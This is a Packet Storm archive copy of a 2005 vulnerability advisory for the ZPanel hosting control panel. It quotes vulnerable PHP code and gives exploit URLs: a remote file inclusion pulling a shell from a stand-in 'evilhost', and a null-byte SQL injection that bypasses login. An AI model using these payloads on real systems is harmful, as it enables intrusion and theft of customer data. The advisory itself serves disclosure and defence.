what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

zpanelFlaws.txt

zpanelFlaws.txt
Posted Mar 22, 2005
Authored by Mikhail

Flaws in ZPanel versions 2.0 and 2.5b10 allow for remote file inclusion and SQL injection attacks.

tags | exploit, remote, sql injection, file inclusion
SHA-256 | 9baeafefe182bb444ac7cc84cdac4d719fd8032824de04cb3b76373092c86081

zpanelFlaws.txt

Change Mirror Download
Hello,

Few bugs have been discovered (accidently) in zPanel.
Developers were notified on 07.March but I have not received any
response.

Best regards, Mikhail.
-------------------------------------------------------------

[Product Description]
"ZPanel is a hosting control interface developed for both Windows and
Linux hosts.
We will soon be developing two different distributions to fit the needs of
both
platforms."
Tested:
ZPanel has been tested on the following server operating systems:
Windows Linux
2000 Advanced Server Fedora 2
2000 Server FreeBSD 4.9, 5.2.1
2003 Enterprise Server Mandrake 9.1, 9.2
XP RedHat 7.3, 9

Versions:
Stable - ZPanel v2.0
Latest Beta - ZPanel v2.5b10

[Summary]
Successful exploitation of an input validation vulnerability in ZPanel
scripts
allows attackers to execute SQL commands, include remote and local files,
get sensetive information.

[Details]
[1] SQL injection #1

Vulnarable script: index.php
Vulnerable code:
--[code]--
if (isset($_POST['uname'])) {

mysql_select_db($database_Customer_Database, $Customer_Database);
$query_TempUser = sprintf("SELECT * FROM custumerbase WHERE
servicename = '".$_POST['uname']."'");
--[/code]--

Not sanitizing userinput variable outbounds directly into SQL query.
It is possible to inject arbitrary SQL statements through 'uname' variable
and bypass the authentification.

In case of invalid user name or password user can see which parameter is
wrong.
As result:
SQL onechar bruteforce technique allows to get sensitive information
(such as nonencrypted passwords in ZPanel v.2, and md5 hashes in ZPanel
v.<=2.5 beta 10).

[2] SQL injection #2 and file inclusion

Vulnerable script: zpanel.php
Vulnerable code:
--[code v.2.5 beta]--
if (isset($_GET['page']) && $_GET['page'] != 'main') {
$query_Modules = sprintf("SELECT * FROM modules WHERE name =
'".$_GET['page']."'");
$Modules = mysql_query($query_Modules, $Customer_Database) or
die(mysql_error());
$row_Modules = mysql_fetch_assoc($Modules);
[...]
if ($row_Modules['active'] == '1') {
$body = "modules/" . $_GET['page'] .
"/index.php";
--[/code]--

or

--[code v.2.0]--
if (!isset($_GET['page'])){
$body = "main.php";
}else{
$body = $_GET['page'] . ".php";
}
--[/code]--

It is possible to include arbitrary file:
local - in version ZPanel <= 2.5 beta 10,
remote - in ZPanel 2.0.

[exploit for v 2.0]
https://localhost/zpanel/zpanel.php?page=https://evilhost/shell
where https://evilhost/shell.php - evil php code script

[exploit for v 2.5 beta]
https://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1

Path disclosing avaliable in case of unsuccessfull exploitation of this
bug.

[3] Installation
By default, installation scripts are not taken away after installation.

https://localhost/ZPanel/admin/install.php

[4] Old scripts
ZPanel uses old buggy scripts. For example
phpBB Forums 2.0.8a.


[DISCLOSURE TIMELINE]

10-03-2005 Initial vendor notification.

[CREDITS & GREETS]
Goes to GHC & specially to Foster
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close